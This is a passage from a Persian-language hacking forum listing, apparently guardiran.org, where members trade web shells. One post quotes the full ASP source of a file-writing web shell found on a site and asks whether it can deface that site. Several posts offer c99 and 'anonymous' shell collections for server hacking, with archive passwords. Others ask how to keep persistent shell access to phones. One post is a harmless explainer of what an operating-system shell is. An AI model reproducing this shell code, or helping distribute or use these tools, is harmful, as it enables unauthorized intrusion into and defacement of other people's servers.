  17. سلام دوستان اول از همه عذر خواهی میکنم بابت اینکه ممکنه سوالم رو جای مناسبی نپرسیده باشم دوستان من یک سایت رو بررسی کردم و به لینکی برخوردم که شامل تصویر زیر میباشد : [Hidden Content] وقتی هم view page source رو میزنم اطلاعات زیر را نشان میدهد . میخوام بدونم با این چه کاری میشود کرد و ایا میتوان سایت رو deface کرد یا خیر ؟ sss <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("filepath"))<>"" then set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.CreateTextFile(testfile,True) thisfile.Write(""&msg& "") if err =0 Then response.write "<font color=red>Successful ....</font>" else response.write "<font color=red>No Permission </font>" end if err.clear thisfile.close set fs = nothing End if %> <form method="POST" ACTION=""> <p align="center"> <input type="text" size="79" name="filepath" value="<%=server.mappath("tuifei.asp")%>"> <BR> <TEXTAREA NAME="Message" ROWS="10" COLS="60"></TEXTAREA> </p> <p align="center"> <input type="submit" name="Send" value="Submit"> </p> </form> <p align="center"></body></html> </body></html><font face="Courier New"> © Copyright 2009 - 2012.<br> Powered x</font> </p> <title>[ - ]</title> صمیمانه از دوستان بخاطر کمک و راهنمایشان تشکر میکنم ...
  18. 1TED

    Guard Iran Shell

    سلام دوستان یک شل اسکریپت برای تیم امنیتیمون ریکد کردم ! این مدت به همین دلیل یکمقدار فعالیتم کم شده بود ! امیدوارم ازم بپزیرید این شلو ! ریکد شده از شل داعس هکر رمز شل guardiran صفحه ورودیش 404 هست نحوه ورود : این هم فضای شل یا حـ ـق ../ <--------به زودی با ورژن دوم میترکونیم--------> 1TED.php
  19. سلام خدمت عزیزان. امروز میخوام بهتون شلر c99 رو آموزش بدم. خوب خیلی از دوستان تازه وارد که قراره از شلر استفاده کنن باید یه تارگت داشته باشن تا بتونن شلر رو امتحان و دستکاری کنند. به قول معروف هر بلایی که میخوان سر شلر بیارن تا یادش بگیرن. خوب به نظر شما چه تارگتی بهتر از سیستم خود ما؟؟؟؟ نه اینترنت لازم داره و نه هزار تا دنگ و فنگ دیگه. تو این آموزش نحوه استفاده از شلر رو در ویندوز آموزش میدم. دوستان همکاری کنند لطفا: نرم افزار مورد نیاز در فیلم رو هم میتونین خیلی راحت با یه جست و جو تو گوگل پیدا کنید. رمز فایل ها: guardiran.org C99.part01.rar C99.part02.rar C99.part03.rar شعار این پست: فدای صفای ایرونی هااا
  20. شرمنده از این که چند روز نبودم شاید تا به حال شماکلمه شل (shell) رو زیاد شنیده باشید ولی نمیدونید که اصلا یعنی چی ؟؟؟ ببینید دوستان شما هر کاری توی ویندوز یا توی هر سیستم عاملی (لینوکس , سلاریس و ..) که انجام میدید به صورت زبان دو دویی در میاد یا همون صفر و یک در میاد بعد به هسته سیستم عامل میخوره بعد به حافظه و بعد اجرا میشه مثلا فرض کنید که میرید توی cmd و میزنید dir خوب معلوم هست که این دستور محتویات یک دایرکتوری رو نشون میشه در واقع این دستور ابتدا به صورت صفر و یک در میاد و بعد اجرا میشه . اون چیزی که دستورات شما رو میگیره و تبدیل به صفر و یک میکنه و اون رو به سمت کرنل سیستم عامل میفرسته همون شل (shell) هست !!! حالا فرض کنید که اصلا چیزی در سیستم های عامل به اسمه شل وجود نداره اونوقت می فهمید که چه قدر کار با کامپیوتر دردسر ساز و سخت بود . مثلا برای اجرای همین دستور dir باید مقادیر زیادی از صفر و یک رو میزدید یا زبان های سطح پایین مثله اسمبلی و hex رو بلد بودید !!! . اما یه نکته خیلی مهمی که در شل ها حائز اهمیت هست فرق اون ها هست مثلا شلری که در ویندوز استفاده میشه فرق میکنه با شلره سیستم عامل لینوکس . اون شلی که در ویندوز استفاده میشه command.com هست (همون cmd رو میگم) و شلی که در سیستم عامل لینوکس به کار گرفته میشه شله bash هست که در پوشه bin ذخیره شده . و البته شل های دیگری هم وجود دارن مثله ksh (freebsd) و csh که در سیستم عامل unix system v استفاده میشه . یک شل خوب چه ویژگی هایی داره ؟؟؟ اگه نظره منو بخاین من شل لینوکس رو بیشتر خاطرشو میخام تا ویندوز (البته این نظر رو از لحاظ هکری میگم ) چون که شل لینوکس از کامپایلر و دیباگر و … خیلی خوبی بهرمند هست و این چیزی هست که در ویندوز نیست مثلا کامپایلر gcc در لینوکس قابلیت خیلی زیادی داره و در ضمن در عین قدیمی بودن خیلی هم قوی هست !! کلا یه شل خوب باید برنامه های زیر رو ساپورت کنه :: Netstat برای دیدن سوکت ها . Gcc برای کامپایل کردن زبان c Lynx یکی از browser های خیلی معتبر و عالی telnet برای ارتباط به پورت ها و …. dig این یکی رو کمتر شلی داره یا این که پولیه !!! ftp برای تبادل اطلاعات ! Finger این یکی هم اطلاعات رو از کاربر میگیره . چگونه میتونیم یه شل لینوکسی در ویندوز داشته باشیم ؟؟؟ شما میتونید برای این کار از برنامه cygwin استفاده کنید . اون رو نصب کنید و بعد دستورات خودتون رو مثلا ls – la رو اجرا کنید !!! خیلی برنامه عجیبی هست و میتونید همه اون برنامه هایی که در لینوکس فقط قابل اجرا هستن رو اجرا کنید مثلا اون برنامه هایی که با پسونده .sh هستن . البته اگه یه نسخه کامل از این برنامه رو گیر اوردین یکی هم برای من بفرسیتید !! البته بعضی از isp ها خیلی لازج بازی در میارن و یعضی وقت ها اکانت شل رو به مشتری هاشون میدن برای اطلاعات بیشتر به isp خودتون تماس بگیرید بعد ازشونبپرسید . و بسیاری از راه های دیگه هم هست که این جا , جای توضیح اون ها نیست . ایا باید زبان شل ها رو بلد باشم ؟؟؟ در جواب باید بگم که یاد گرفتن زبان شل هایی مثله command.com یا bash از نون شب هم واجب تره ! البته شل bash به خاطر امکانات بیشتری که داره کار باهاش هم سخت تره و همچینین دستورات و فرامین بیشتری رو در خود جا داده . بدیهی هست که دستورات شل ها مختلف هست مثلا در command.com از دستور ver برای دیدن مشخصات سیستم عامل بکار میره ولی همین دستور در لینوکس و در شلر اون که bash هست دستور uname –a استفاده میشه . ولی در اکثر جا ها خیلی با هم فرق ندارن مثلا دستورات در لینوکس و سلاریس تقریبا یکی هست !! امیدوارم که مفید واقع شده باشه .
  21. a.a.a

    شل گرفتن از موبایل

    با سلام میشه بگید چجور میشه از یه گوشی شل گرفت یعنی دوباره نیازی به هک کردن گوشی نداشت فکر کنم قرار اقای all_c.g2 اموزششو بذارن ولی نذاشتن
  22. icebool

    شل گرفتن از گوشی

    با سلام چجورمیشه از یک گوشی شل گرفت و همیشه به اون گوشی دسترسی داشت
  23. سلام میشه یه سری از اطلاعت یه شل رو بدین برای مثال اطلاعات شل کجا قرار میگیره و نحوه استفادش چجوریه
  24. DeMoN

    شل anonymous برای سرور هکینگ

    باسلام خدمت تمامی دوستان عزیز گارد ایران .امروز یک شل قدرتمند از آنونیموس براتون تهیه کردم که امیدوارم به دردتون بخوره و لذت ببرین. این شل دارای دونسخه v1. و v1.1 هست که بنده هردو رو برای شما دوستان قرار دادم. anonymous-v1.0.0.php anonymous-v1.1.0.txt
  25. icelord

    دانلود مجموعه شل های c99

    با سلام خدمت اعضای محترم گارد ایران. مجمموعه ای از شل های c99 رو براتون آماده کردم،تمامی شل ها تست شدن و به خوبی کار می کنن. پسورد فایل رار: guardiran.org c99l.rar
×
×
  • ایجاد مورد جدید...